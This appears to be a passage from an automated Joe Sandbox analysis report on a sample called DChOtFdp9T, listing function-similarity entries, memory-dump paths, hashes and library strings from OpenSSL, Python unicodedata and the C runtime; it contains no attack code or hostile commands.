                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                            • String ID: a unicode character$argument 1$numeric
                                                                                                                                                                                                                            • API String ID: 3876575403-2385192657
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                            • String ID: a unicode character$argument 1$name
                                                                                                                                                                                                                            • API String ID: 3876575403-4190364640
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                            • String ID: a unicode character$argument 1$decimal
                                                                                                                                                                                                                            • API String ID: 3876575403-2474051849
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_CTX_set_ct_validation_callback
                                                                                                                                                                                                                            • API String ID: 1552677711-4243395191
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                            • String ID: a unicode character$argument$combining
                                                                                                                                                                                                                            • API String ID: 3979797681-4202047184
                                                                                                                                                                                                                            • Opcode ID: f57a56bca3f03315399802cbb188705c8f0221a3905f8c719d86b24713be5e96
                                                                                                                                                                                                                            • Instruction ID: 07f56e93260cd066f04908806516d0e87a80a3456c6b1b799941f5dfc1b5ac0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f57a56bca3f03315399802cbb188705c8f0221a3905f8c719d86b24713be5e96
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10017C60F1CA4381EB2C9B55A8609B822A0FF09764FC406B9D97E572DDDF3CE5958340
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                            • String ID: a unicode character$argument$mirrored
                                                                                                                                                                                                                            • API String ID: 3979797681-4001128513
                                                                                                                                                                                                                            • Opcode ID: 90d5ae0072a7ca6e879d97d47db35ea336886febc9b0d1b251bdc56bef49b412
                                                                                                                                                                                                                            • Instruction ID: 8d5d1fd8a5f2e43255d89172207a961d040d18810c85cb228ee648ba054819b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90d5ae0072a7ca6e879d97d47db35ea336886febc9b0d1b251bdc56bef49b412
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E018F60F0DA8386EB1C9B11E8609B823A4FF49794FC406B5D97D5B2D9EF3CE5948304
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$RSA$ssl_log_rsa_client_key_exchange
                                                                                                                                                                                                                            • API String ID: 193678381-1475867426
                                                                                                                                                                                                                            • Opcode ID: f25f34968bdcff2f8098303b8c5ba009518d81c069525133a3d8b9fc3598560d
                                                                                                                                                                                                                            • Instruction ID: cf4d56309fbdda14ab5275b6e139f0b9229d336dce22a844b603397f2ad80e18
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f25f34968bdcff2f8098303b8c5ba009518d81c069525133a3d8b9fc3598560d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F06261F1864285E7509751FC31EEA5740AB95780F844230DD7CC77DBEE2CD6518B00
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Mem_$Capsule_Err_FreeMallocMemory
                                                                                                                                                                                                                            • String ID: unicodedata._ucnhash_CAPI
                                                                                                                                                                                                                            • API String ID: 3673501854-3989975041
                                                                                                                                                                                                                            • Opcode ID: 04962b3129ec8039d4574c2b15526bc82bf072c2335504b47079f601afa57e40
                                                                                                                                                                                                                            • Instruction ID: 163561a7af23ed99da35b5fad1d8a52185e5d9dd7a4df5adc127fba8848f993e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04962b3129ec8039d4574c2b15526bc82bf072c2335504b47079f601afa57e40
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19F01920B1DB4795EB098B51A87497863A8BF19B81FC815B5CC6E063ECEF3CE044D310
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_read
                                                                                                                                                                                                                            • API String ID: 1552677711-152370140
                                                                                                                                                                                                                            • Opcode ID: 9f526387a2ec5312fa6aaf9e7fc70be552789ac35b2de73a8e5f36ca7372d6e1
                                                                                                                                                                                                                            • Instruction ID: 75a1dc8c20ad3a0509b6ca865ec39ac2680aa431b6074f7fae3d095f212ebda4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f526387a2ec5312fa6aaf9e7fc70be552789ac35b2de73a8e5f36ca7372d6e1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0B451F0964247F705B764D862EE963109F81310FD04231E63CC69DFDE2DEA464B10
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            • Opcode ID: c363bace5bda0f06f40d3f02de499b28d92a603ede12d76f1b185844c60c5271
                                                                                                                                                                                                                            • Instruction ID: b5aee352305c4dbf249c6b6d74961919f0a3851795192f7b1c84ca149870ad73
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c363bace5bda0f06f40d3f02de499b28d92a603ede12d76f1b185844c60c5271
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29F09661F0870681FB108B26E4483395B60FF89BA9F740635C9ADC55F6CFACD449C740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl3_ctx_ctrl
                                                                                                                                                                                                                            • API String ID: 1552677711-780421027
                                                                                                                                                                                                                            • Opcode ID: 9f40065096a489ec579aeff0d82d84e26f7835b22762022f6dd4af4b007f3806
                                                                                                                                                                                                                            • Instruction ID: d1abab71ab91ab144f5888f565858c1e0cd99c41644db7bc31999a788207b2e1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f40065096a489ec579aeff0d82d84e26f7835b22762022f6dd4af4b007f3806
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21F08265B1C981C5EB558765E061AF95311EB843D0FC41232DE3DCA6CFED1CE5408B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_check_private_key
                                                                                                                                                                                                                            • API String ID: 1552677711-2796319112
                                                                                                                                                                                                                            • Opcode ID: 6db94ea9f7a0a5273a9064cd9723a29928c20aeccac15a69c6468e03f7ce0fc3
                                                                                                                                                                                                                            • Instruction ID: f06f0fc20cbc5bfc68764da0753a76cd5ef302b604bd8029370e833bce1cbb18
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6db94ea9f7a0a5273a9064cd9723a29928c20aeccac15a69c6468e03f7ce0fc3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8E0EC44B1A6821BE354A770C862AE95701AB82310FC40271E63DD6ADB9D2CA9499B51
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_undefined_function
                                                                                                                                                                                                                            • API String ID: 1552677711-2204979087
                                                                                                                                                                                                                            • Opcode ID: 005a015233e572f9fbda722fc991ec777c59a174368f1848314541746e726609
                                                                                                                                                                                                                            • Instruction ID: 5b7ab559880706c8d27b75440a6b1298f25d0b30e9a73ae0d7979cbfeacde981
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 005a015233e572f9fbda722fc991ec777c59a174368f1848314541746e726609
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7D01704F1928346F748B364D866EE98310AF86300FD44230EA3CC6ADFED2CAA465B10
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\s3_lib.c$ssl3_ctx_ctrl
                                                                                                                                                                                                                            • API String ID: 1552677711-780421027
                                                                                                                                                                                                                            • Opcode ID: 8dc164d9e2ad24b4fe71820d1deaeed4ba554716e3c06c340051bf947e368986
                                                                                                                                                                                                                            • Instruction ID: 30cf1badd11fb1659f7d64aaf455b29b9914be36538535d43a4adee6867a7bb1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dc164d9e2ad24b4fe71820d1deaeed4ba554716e3c06c340051bf947e368986
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8D0EC55B1C4428AE7449354E432AF953119B85310FC45232DA3DC65DFED3CE9408F00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_undefined_function
                                                                                                                                                                                                                            • API String ID: 1552677711-2204979087
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_undefined_function
                                                                                                                                                                                                                            • API String ID: 1552677711-2204979087
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_undefined_function
                                                                                                                                                                                                                            • API String ID: 1552677711-2204979087
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_check_private_key
                                                                                                                                                                                                                            • API String ID: 1552677711-2796319112
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA22F
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA24E
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA276
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA287
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A9423,?,?,00000000,00007FF6029A96BE,?,?,?,?,?,00007FF6029A964A), ref: 00007FF6029AA298
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 164cce6a714c33d590dbf5a231661e3c170dabd4dca5a082530e71b77cfa47c9
                                                                                                                                                                                                                            • Instruction ID: 02b421b03c9dd081dc2a305b6c1ce0c24cae06c17d3a6b44948bb8b23705faba
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 164cce6a714c33d590dbf5a231661e3c170dabd4dca5a082530e71b77cfa47c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51114C20E0C70243FB999727964117969926F547B8F344734EC3E86BDBDEADE851C390
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 987f2d2f8bcbd6da4d65e957e3df99a19c4bd98af1fd43d774899e04b2e30741
                                                                                                                                                                                                                            • Instruction ID: eb012d2ca46df2bfd2c885f2f8306a9124e049fde9df221e1a15bcc34b7060f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 987f2d2f8bcbd6da4d65e957e3df99a19c4bd98af1fd43d774899e04b2e30741
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2111B10E0C30352FBA9A73758521B919925F5577CF380B38D93ECA6D3DEACB44183A0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2231116090-0
                                                                                                                                                                                                                            • Opcode ID: 3d285a002c56b6de86fe131ddd1a0fc9517e9b5a90d74e380aee27a01ffdaadb
                                                                                                                                                                                                                            • Instruction ID: 81b57889901bddf3f4e0d5596b22d4e26e16d4b9aca2922cbe9fe681605da1f6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d285a002c56b6de86fe131ddd1a0fc9517e9b5a90d74e380aee27a01ffdaadb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21014B11F1A64245FF99A766A565BB953909F48BC8F4C0631EE7CCB7CEFE2CE4814200
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: X509_$E_dupE_freeL_sk_new_nullL_sk_pushX509_get_subject_name
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2231116090-0
                                                                                                                                                                                                                            • Opcode ID: b2fedaaf82cc596761f7f70862d0ceb5c57fd5d302ec1c1f2f54fdb3612ddc0f
                                                                                                                                                                                                                            • Instruction ID: 404ab51b1d3408d392ae388f50f80ea283867f4381d95c14fc475967c3a1ee3e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2fedaaf82cc596761f7f70862d0ceb5c57fd5d302ec1c1f2f54fdb3612ddc0f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E001EC11F0A64245FF5A97A6A165BB953919F447C8F4C0632EE3DCA7CEFE2CE4418600
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                            • Opcode ID: b6b6fd321123da95521851cb16ed594db0a84da0c81b575458532337a560e12c
                                                                                                                                                                                                                            • Instruction ID: 0e28f3711433028e44ee642cd4df3a5257ca9fdc99f9fe737d60fdfa3b0427b4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6b6fd321123da95521851cb16ed594db0a84da0c81b575458532337a560e12c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C291BD22F08B4685F7619E26D45037D3B91AF40B98FE64136DA5E873D6DEBCE8058380
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
